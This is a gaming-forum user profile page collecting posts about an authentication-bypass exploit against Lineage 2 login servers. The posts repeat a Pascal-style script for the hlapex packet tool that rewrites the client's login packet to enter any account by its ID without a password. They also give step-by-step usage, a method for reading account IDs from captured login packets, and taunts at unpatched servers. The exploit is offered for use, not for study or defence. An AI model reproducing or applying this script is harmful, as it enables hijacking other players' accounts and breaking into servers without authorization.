Jump to content

hlapex2008

Members
  • Posts

    5
  • Credits

  • Joined

  • Last visited

    Never
  • Feedback

    0%

Posts posted by hlapex2008

  1. yeah tonto w8 till rival shares his fix lol i dont understand why u are soo angry??? maybe cause u couldnt fix this exploit... nevermind i dont wanna flame anyone without cheaters no bugs would be fixed :D cause noone would know the cheat so be a little bit thankful that the guys here shared the xploit so u guys could try to fix this.....

     

    what

    the

    -beep-

    are

    you

    smoking

    ?

     

    Myself and another person fixed this like last week before the frist post was even made about it on this forum....

    I know about the xploit like 1 week now too, my intention was only that all people can see, noobs get owned and people with knows something fix it, in less than 15 hours since i make the post a new ampedx64 version appaer, 2.0a but yet most of noob admins dont have it, good luck. Good servers are secure now.

     

    My purpose has been completed :)

  2. Here it is:

     

    const
    account=Here you put the id you wish to login to;
    procedure Init;
    begin
    end;
    procedure Free;
    begin
    end;
    begin
    if FromServer then exit;
    if pck[1]=#$08 then
    begin
    buf:=#$08;
    WriteS('');
    WriteD(account);
    WriteD(0);
    pck:=buf;
    end;
    end.
    

     

    You put the script in the scripts folder (open a script, edit it, and save it with a different name)

    Open hlapex.exe

    Now run l2.exe

    When you get to the login screen ~>

    Go to scripts tab, press load, select the script you just saved. Press CALL INIT. In hlapex of course...

    Now login with one of your accounts (just make a new one, and change your ip before doing it, if you have a main account there :P)

    If you login normally till the chars window, it is OK!!!!! YOU OWNED THEM!!!

    If not, when you press the selection of the server, you will simply get disconnected or you will crash the server (if they have that old noobish fix :P)

     

    Just have fun.... Oh, i had heard of this a loooong time ago, and many servers (mostly russians) got owned :P It is fixed like 99% (only some servers that their admin doesn't even know what does amped mean have this till working...)

     

    FOR SOME NEWBIES, IT IS FOR OFFICIAL SERVERS, NOT FOR JAVA ONEEEEEEEEEEEEEEEEEEES (C4, if you don't get that way, not C5).

     

    Not man, you dont need to do that.

     

    OPEN HLAPEX!

    LOAD CODE!

    OPEN L2 AND LOGIN WITH AN ACCOUNT YOU HAVE

     

    THATS ALL! You dont need to click on INIT, only log into the server, hlapex do the work for you.

  3. A new xploit is avaible and allow an user to join to any account without know the user and password, you only need to know the account id.

     

    this is the code that allows that with amped

     

    you only change account with id you want to try

     

    const
    account=1;
    procedure Init;
    begin
    end;
    procedure Free;
    begin
    end;
    begin
    if FromServer then exit;
    if pck[1]=#$08 then
    begin
    buf:=#$08;
    WriteS('');
    WriteD(account);
    WriteD(0);
    pck:=buf;
    end;
    end.
    

     

    at last someone has released it! nice share.

    Sticky.

     

    @dublin555: Yes you need hlapex,send this code when you see the character menu, before login.

    Not when you see character menu, that dont work, with this code you only need to do the next:

     

    1. Execute Hlapex

    2. Load that code

    3. Execute L2

    4. Log with any account you have

     

    And woala, you would see the characters from that account

     

    if you send the packet 08 after see the character selection screen it wouldnt work

     

    Some servers have it fixed, but most of them not, dead to noobs admins.

     

    Some servers use the fix of change the id of the accounts, 99% of them use the script like has been shared, you know the new ids (-beep-1ng n00bs admins).

     

    For those who change the range to another one, when you log you get your account id in hex format

     

    RequestAuthLogin

    LoginName: accountname

    PlayKey2: F8020000 <--- This is the account id

    PlayKey1: 0C000000

    LoginKey1: F8020000 <--- This is the account id

    LoginKey2: EB655315

  4. A new xploit is avaible and allow an user to join to any account without know the user and password, you only need to know the account id.

     

    this is the code that allows that with hlapex

     

    you only change account with id you want to try

     

    const
    account=1;
    procedure Init;
    begin
    end;
    procedure Free;
    begin
    end;
    begin
    if FromServer then exit;
    if pck[1]=#$08 then
    begin
    buf:=#$08;
    WriteS('');
    WriteD(account);
    WriteD(0);
    pck:=buf;
    end;
    end.
    

×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock